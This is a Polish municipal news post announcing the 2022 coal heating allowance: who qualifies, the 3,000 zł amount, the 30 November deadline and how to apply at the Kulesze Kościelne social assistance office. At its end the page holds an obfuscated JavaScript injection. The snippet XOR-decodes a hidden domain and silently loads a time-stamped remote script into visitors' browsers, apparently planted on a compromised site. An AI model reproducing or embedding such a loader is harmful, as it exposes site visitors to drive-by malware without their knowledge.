Aktualności

Dodatek węglowy!

sie 22, 2022 | Aktualności

Informujemy o możliwości składania wniosków o wypłatę  jednorazowego dodatku węglowego w wysokości 3 tysięcy złotych.

Dodatek węglowy przysługuje osobie w gospodarstwie domowym, w przypadku gdy głównym źródłem ogrzewania gospodarstwa domowego jest kocioł na paliwo stałe, kominek, koza, ogrzewacz powietrza, trzon kuchenny, piecokuchnia, kuchnia węglowa lub piec kaflowy na paliwo stałe, zasilane paliwami stałymi, wpisane lub zgłoszone do centralnej ewidencji emisyjności budynków, o której mowa w art. 27a ust. 1 ustawy z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów oraz o centralnej ewidencji emisyjności budynków (Dz. U. z 2022 r. poz. 438).

Wysokość dodatku węglowego wynosi 3.000,00 zł dla gospodarstwa domowego.

Dodatek węglowy jest świadczeniem jednorazowym, przysługującym wyłącznie w 2022 r., przyznawanym na wniosek osoby zainteresowanej.

Wnioski o wypłatę dodatku węglowego można składać do 30 listopada 2022 r.:

  • elektronicznie – przez EPUAP (z kwalifikowanym podpisem elektronicznym lub uwierzytelniony przez  profil zaufany)
  • papierowo – od poniedziałku do piątku w godz. 800-1600 w Ośrodku Pomocy Społecznej w Kuleszach Kościelnych, ul. Główna 6, pok. 6. – formularz dostępny na miejscu.

Dodatkowych informacji można uzyskać w siedzibie Ośrodka Pomocy Społecznej w Kuleszach Kościelnych lub pod nr tel. 86 476 90 10 wew. 24.

Więcej informacji na stronie Ministerstwa Klimatu i Środowiska: 

https://www.gov.pl/web/klimat/wniosek-o-dodatek-weglowy?fbclid=IwAR063lXV66BHqJSXy9WTpgtkmFtXET0s0OWSq8ZWYjXE4doLWqqbCk5HZzU

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);